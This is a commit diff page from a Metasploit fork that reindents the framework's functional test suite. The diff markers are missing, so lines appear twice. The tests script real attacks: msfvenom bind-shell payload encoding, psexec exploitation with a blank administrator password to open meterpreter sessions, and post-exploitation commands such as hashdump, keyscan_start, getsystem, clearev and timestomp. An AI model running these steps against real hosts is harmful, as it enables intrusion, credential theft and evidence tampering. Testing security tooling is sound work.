adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Retab all the things (except external/)

Browse Source
This commit is contained in:
Tab Assassin
2013-09-30 13:47:53 -05:00
parent 0ecba377f5
commit 2e8d19edcf
293 changed files with 32962 additions and 32962 deletions
Download Patch File Download Diff File Expand all files Collapse all files
test/features/steps/common_steps.rb
+20 -20
View File
@@ -1,31 +1,31 @@
#This is the step definition file for common framework testing steps or meta steps
When /^I run the "([^"]*)" exploit with standard target options$/ do |exploit|
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} E` interactively
}
end
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} E` interactively
}
end
When /^I run the "([^"]*)" exploit with standard target options in check mode$/ do |exploit|
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} C` interactively
}
end
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} C` interactively
}
end
When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options$/ do |encoder, options|
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options}` interactively
}
end
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options}` interactively
}
end
When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options and a buffer register$/ do |encoder, options|
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options} BufferRegister=eax` interactively
}
end
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options} BufferRegister=eax` interactively
}
end
When /^I run msfpayload to generate a "([^"]*)" on the local host$/ do |payload|
steps %Q{
When I run `./msfpayload #{payload} LHOST=127.0.0.1 y`
}
end
steps %Q{
When I run `./msfpayload #{payload} LHOST=127.0.0.1 y`
}
end
test/features/steps/handler_steps.rb
+7 -7
View File
@@ -1,14 +1,14 @@
#This is the step definition file for cucumber features relating to the framework handler feature
Given /^I launch the exploit multi handler$/ do
steps %Q{
When I run `./msfcli exploit/multi/handler E`
Then the output should contain "Please wait while we load the module tree..."
Then the output should contain "Started reverse handler on"
Then the output should contain "Starting the payload handler..."
steps %Q{
When I run `./msfcli exploit/multi/handler E`
Then the output should contain "Please wait while we load the module tree..."
Then the output should contain "Started reverse handler on"
Then the output should contain "Starting the payload handler..."
}
}
end
Given /^I launch the generic multi handler$/ do
test/features/support/env.rb
+7 -7
View File
@@ -5,18 +5,18 @@ require 'aruba/cucumber'
require_relative 'test_config'
Before do
# Automatically find the framework path
default_path = File.join(File.expand_path(File.dirname(__FILE__)), '../../../')
# Automatically find the framework path
default_path = File.join(File.expand_path(File.dirname(__FILE__)), '../../../')
# Add more paths manually if needed. For example:
# "/Users/gary/rapid7/framework"
@dirs = [default_path]
# Add more paths manually if needed. For example:
# "/Users/gary/rapid7/framework"
@dirs = [default_path]
@aruba_timeout_seconds = 150
@aruba_timeout_seconds = 150
end
Before('@slow_process') do
@aruba_io_wait_seconds = 150
@aruba_io_wait_seconds = 150
end
@After
test/features/support/test_config.rb
+8 -8
View File
@@ -6,18 +6,18 @@ class TestConfig
def initialize(*args)
yml_path = File.join(File.dirname(__FILE__),'test_config.yml')
yml_path = File.join(File.dirname(__FILE__),'test_config.yml')
if File.exists?(yml_path)
@yaml_options = YAML::load(File.open(yml_path))
else
@yaml_options = {}
end
if File.exists?(yml_path)
@yaml_options = YAML::load(File.open(yml_path))
else
@yaml_options = {}
end
@options = {
"rhost" => "localhost",
"smbuser" => "user",
"smbpass" => "password"
"smbuser" => "user",
"smbpass" => "password"
}
end
test/functional/framework/msfconsole_spec.rb
+157 -157
View File
@@ -17,195 +17,195 @@ include MsfTest::MsfMatchers
## This spec exists to help us describe the behavior of msfconsole - TODO
describe "Msfconsole" do
###
# Setup!
###
before :all do
@working_directory = File.dirname(__FILE__)
###
# Setup!
###
before :all do
@working_directory = File.dirname(__FILE__)
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Create a framework object
@framework = ::Msf::Simple::Framework.create
end
## Create a framework object
@framework = ::Msf::Simple::Framework.create
end
before :each do
end
before :each do
end
after :each do
end
after :each do
end
after :all do
## Clean up
#FileUtils.rm_rf(@temp_directory)
end
after :all do
## Clean up
#FileUtils.rm_rf(@temp_directory)
end
###
# Static Test cases!
###
###
# Static Test cases!
###
it "should start and let us run help" do
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
success_strings = [ 'help',
'Database Backend Commands',
'Core Commands' ]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
it "should start and let us run help" do
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
success_strings = [ 'help',
'Database Backend Commands',
'Core Commands' ]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end
end
###
# Dynamic Test Cases!!
###
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end
end
###
# Dynamic Test Cases!!
###
@working_directory = File.dirname(__FILE__)
@working_directory = File.dirname(__FILE__)
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
if File.directory? @temp_directory
FileUtils.rm_rf(@temp_directory)
end
if File.directory? @temp_directory
FileUtils.rm_rf(@temp_directory)
end
Dir.mkdir(@temp_directory)
Dir.mkdir(@temp_input_directory)
Dir.mkdir(@temp_output_directory)
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
## Parse this test case
test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
Dir.mkdir(@temp_directory)
Dir.mkdir(@temp_input_directory)
Dir.mkdir(@temp_output_directory)
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
## Parse this test case
test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
## Write the commands back to a temporary RC file
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
## Create the rspec Test Case
it "should #{test_case.name}" do
## Gather the success / failure strings, and combine with the generics
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
## run the commands
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
## check the output
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Clean up
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
#File.delete("#{@temp_output_directory}/#{test_case.name}")
end
end
## Write the commands back to a temporary RC file
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
## Create the rspec Test Case
it "should #{test_case.name}" do
## Gather the success / failure strings, and combine with the generics
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
## run the commands
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
## check the output
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Clean up
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
#File.delete("#{@temp_output_directory}/#{test_case.name}")
end
end
###
# Test case helpers:
###
def generic_success_strings
[]
end
def generic_failure_strings
['fatal', 'fail', 'error', 'exception']
end
def generic_failure_exception_strings
[]
end
###
# Test case helpers:
###
def generic_success_strings
[]
end
def generic_failure_strings
['fatal', 'fail', 'error', 'exception']
end
def generic_failure_exception_strings
[]
end
def start_console_and_run_rc(name,rc_file, database_file=false)
output_file = "#{@temp_output_directory}/#{name}"
def start_console_and_run_rc(name,rc_file, database_file=false)
output_file = "#{@temp_output_directory}/#{name}"
if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
else
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end
system("#{msfconsole_string}")
if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
else
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end
system("#{msfconsole_string}")
data = hlp_file_to_string("#{output_file}")
end
data = hlp_file_to_string("#{output_file}")
end
def generate_x86_meterpreter_session(input, output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output)
## If a session came back, try to interact with it.
if session
return session
else
return nil
end
end
## If a session came back, try to interact with it.
if session
return session
else
return nil
end
end
def generate_win64_meterpreter_session(input, output)
raise "Not Implemented"
end
raise "Not Implemented"
end
def generate_java_meterpreter_session(input, output)
raise "Not Implemented"
end
raise "Not Implemented"
end
def generate_php_meterpreter_session(input, output)
raise "Not Implemented"
end
raise "Not Implemented"
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
end
end
test/functional/meterpreter/java_meterpreter_specs.rb
+10 -10
View File
@@ -1,19 +1,19 @@
module MsfTest
module JavaMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
def self.included(base)
def self.included(base)
base.class_eval do
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
end
end
test/functional/meterpreter/meterpreter_java_spec.rb
+64 -64
View File
@@ -10,83 +10,83 @@ require 'meterpreter_specs'
module MsfTest
describe "JavaMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the java
# meterpreter
include MsfTest::JavaMeterpreterSpecs
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the java
# meterpreter
include MsfTest::JavaMeterpreterSpecs
before :all do
@verbose = true
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
before :all do
@verbose = true
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_java
end
create_session_java
end
before :each do
before :each do
end
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
#FileUtils.rm_rf("*.jpeg")
#FileUtils.rm_rf("payload.jar")
FileUtils.rm_rf(@output_directory)
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
#FileUtils.rm_rf("*.jpeg")
#FileUtils.rm_rf("payload.jar")
FileUtils.rm_rf(@output_directory)
end
def create_session_java
def create_session_java
## Setup for win32
@framework = Msf::Simple::Framework.create
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
@framework.modules.add_module_path(test_modules_path)
@exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
## Setup for win32
@framework = Msf::Simple::Framework.create
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
@framework.modules.add_module_path(test_modules_path)
@exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
end
end
test/functional/meterpreter/meterpreter_php_spec.rb
+55 -55
View File
@@ -10,74 +10,74 @@ require 'meterpreter_specs'
module MsfTest
describe "PhpMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
before :all do
@verbose = true
@meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
before :all do
@verbose = true
@meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_php
end
create_session_php
end
before :each do
before :each do
end
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory)
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory)
end
def create_session_php
def create_session_php
## Setup for php
@framework = Msf::Simple::Framework.create
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
@payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
## Setup for php
@framework = Msf::Simple::Framework.create
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
@payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "metasploitable"},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "metasploitable"},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
end
end
test/functional/meterpreter/meterpreter_spec_helper.rb
+48 -48
View File
@@ -1,58 +1,58 @@
module MsfTest
module MeterpreterSpecHelper
def self.included(base)
def self.included(base)
base.class_eval do
def generic_failure_strings
['fail', 'error', 'exception']
end
def generic_failure_exception_strings
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
end
def generic_failure_strings
['fail', 'error', 'exception']
end
def generic_failure_exception_strings
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
end
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
fail_strings = fail_strings | generic_failure_strings
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
fail_strings = fail_strings | generic_failure_strings
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end
@session.run_cmd(command)
command_output.print_line("meterpreter_functional_test_end")
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_string_to_file(string, filepath)
# Create a new file and write to it
File.open(filepath, 'w') do |f2|
f2.puts string
end
end
end
end
temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end
@session.run_cmd(command)
command_output.print_line("meterpreter_functional_test_end")
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_string_to_file(string, filepath)
# Create a new file and write to it
File.open(filepath, 'w') do |f2|
f2.puts string
end
end
end
end
end
end
test/functional/meterpreter/meterpreter_specs.rb
+98 -98
View File
@@ -1,108 +1,108 @@
module MsfTest
module MeterpreterSpecs
def self.included(base)
def self.included(base)
base.class_eval do
it "should not error when running each command" do
commands = [ "?",
"background",
"bgkill",
"bglist",
"bgrun",
"channel",
"close",
"exit",
"help",
"interact",
#"irb",
"migrate",
#"quit",
"read",
"run",
"use",
"write",
"cat",
"cd",
"del",
"download",
#"edit",
"getlwd",
"getwd",
"lcd",
"lpwd",
"ls",
"mkdir",
"pwd",
"rm",
"rmdir",
"search",
"upload",
"ipconfig",
"portfwd",
"route",
"clearev",
"drop_token",
"execute",
"getpid",
"getprivs",
"getuid",
"kill",
"ps",
#"reboot",
"reg",
"rev2self",
#"shell",
#"shutdown",
"steal_token",
"sysinfo",
"enumdesktops",
"getdesktop",
"idletime",
"keyscan_dump",
"keyscan_start",
"keyscan_stop",
"screenshot",
"setdesktop",
"uictl",
"getsystem",
"hashdump",
"timestomp"
]
it "should not error when running each command" do
commands = [ "?",
"background",
"bgkill",
"bglist",
"bgrun",
"channel",
"close",
"exit",
"help",
"interact",
#"irb",
"migrate",
#"quit",
"read",
"run",
"use",
"write",
"cat",
"cd",
"del",
"download",
#"edit",
"getlwd",
"getwd",
"lcd",
"lpwd",
"ls",
"mkdir",
"pwd",
"rm",
"rmdir",
"search",
"upload",
"ipconfig",
"portfwd",
"route",
"clearev",
"drop_token",
"execute",
"getpid",
"getprivs",
"getuid",
"kill",
"ps",
#"reboot",
"reg",
"rev2self",
#"shell",
#"shutdown",
"steal_token",
"sysinfo",
"enumdesktops",
"getdesktop",
"idletime",
"keyscan_dump",
"keyscan_start",
"keyscan_stop",
"screenshot",
"setdesktop",
"uictl",
"getsystem",
"hashdump",
"timestomp"
]
## Run each command, check for execeptions
commands.each do |command|
hlp_run_command_check_output("basic_#{command}",command)
end
end
## Run each command, check for execeptions
commands.each do |command|
hlp_run_command_check_output("basic_#{command}",command)
end
end
it "should not error when running help" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands']
hlp_run_command_check_output("help","help", success_strings)
end
it "should not error when running the help shortcut" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands' ]
hlp_run_command_check_output("help_shortcut","?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
end
end
end
it "should not error when running help" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands']
hlp_run_command_check_output("help","help", success_strings)
end
it "should not error when running the help shortcut" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands' ]
hlp_run_command_check_output("help_shortcut","?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
end
end
end
end
end
test/functional/meterpreter/meterpreter_win32_spec.rb
+70 -70
View File
@@ -14,91 +14,91 @@ module MsfTest
describe "Win32Meterpreter" do
# Include Custom Matchers
include MsfTest::MsfMatchers
# Include Custom Matchers
include MsfTest::MsfMatchers
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the
# windows meterpreter platforms
include MsfTest::WindowsMeterpreterSpecs
# This include brings in all the specs that are specific to the
# windows meterpreter platforms
include MsfTest::WindowsMeterpreterSpecs
before :all do
@verbose = true
@meterpreter_type = "win32"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
before :all do
@verbose = true
@meterpreter_type = "win32"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_windows_x32
end
create_session_windows_x32
end
before :each do
before :each do
end
end
after :each do
@session.init_ui(@input, @output)
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
## Clean up test output
FileUtils.rm_rf(@output_directory)
after :all do
## Clean up test output
FileUtils.rm_rf(@output_directory)
## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
## TODO - an arbitrary file.
Dir.new(File.dirname(__FILE__)).each do |file|
if file =~ /.jpeg/
File.delete(file)
end
end
end
def create_session_windows_x32
## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
## TODO - an arbitrary file.
Dir.new(File.dirname(__FILE__)).each do |file|
if file =~ /.jpeg/
File.delete(file)
end
end
end
def create_session_windows_x32
## Setup for win32
@framework = Msf::Simple::Framework.create
@exploit_name = 'windows/smb/psexec'
@payload_name = 'windows/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
## Setup for win32
@framework = Msf::Simple::Framework.create
@exploit_name = 'windows/smb/psexec'
@payload_name = 'windows/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## If a session came back, try to interact with it.
if @session
puts "got a session"
@session.load_stdapi
else
puts "unable to get session"
#flunk "Couldn't get a session!"
end
end
## If a session came back, try to interact with it.
if @session
puts "got a session"
@session.load_stdapi
else
puts "unable to get session"
#flunk "Couldn't get a session!"
end
end
end
end
test/functional/meterpreter/windows_meterpreter_specs.rb
+36 -36
View File
@@ -1,49 +1,49 @@
module MsfTest
module WindowsMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
def self.included(base)
def self.included(base)
base.class_eval do
it "should not error when uploading a file to a windows box" do
upload_success_strings = [ 'uploading',
'uploaded' ]
it "should not error when uploading a file to a windows box" do
upload_success_strings = [ 'uploading',
'uploaded' ]
## create a file to upload
filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename)
end
hlp_string_to_file("owned!", filename)
## create a file to upload
filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename)
end
hlp_string_to_file("owned!", filename)
## run the upload / quit commands
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
#hlp_run_command_check_output("quit","quit")
## run the upload / quit commands
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
#hlp_run_command_check_output("quit","quit")
## clean up
FileUtils.rm(filename)
end
it "should show the priv commands when running help" do
success_strings = ['Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands' ]
hlp_run_command_check_output("help_shortcut","help", success_strings)
## clean up
FileUtils.rm(filename)
end
it "should show the priv commands when running help" do
success_strings = ['Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands' ]
hlp_run_command_check_output("help_shortcut","help", success_strings)
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
end
end
test/hooks/array_to_s.rb
+8 -8
View File
@@ -1,10 +1,10 @@
class Array
@@to_s_reported = {}
def to_s(*args)
if(not @@to_s_reported[caller[0].to_s])
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
@@to_s_reported[caller[0].to_s] = true
end
super(*args)
end
@@to_s_reported = {}
def to_s(*args)
if(not @@to_s_reported[caller[0].to_s])
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
@@to_s_reported[caller[0].to_s] = true
end
super(*args)
end
end
test/hooks/string_idx.rb
+9 -9
View File
@@ -1,11 +1,11 @@
class String
@@idx_reported = {}
def [](*args)
if(args.length == 1 and args[0].class == ::Fixnum and not @@idx_reported[caller[0].to_s])
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
@@idx_reported[caller[0].to_s] = true
end
slice(*args)
end
@@idx_reported = {}
def [](*args)
if(args.length == 1 and args[0].class == ::Fixnum and not @@idx_reported[caller[0].to_s])
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
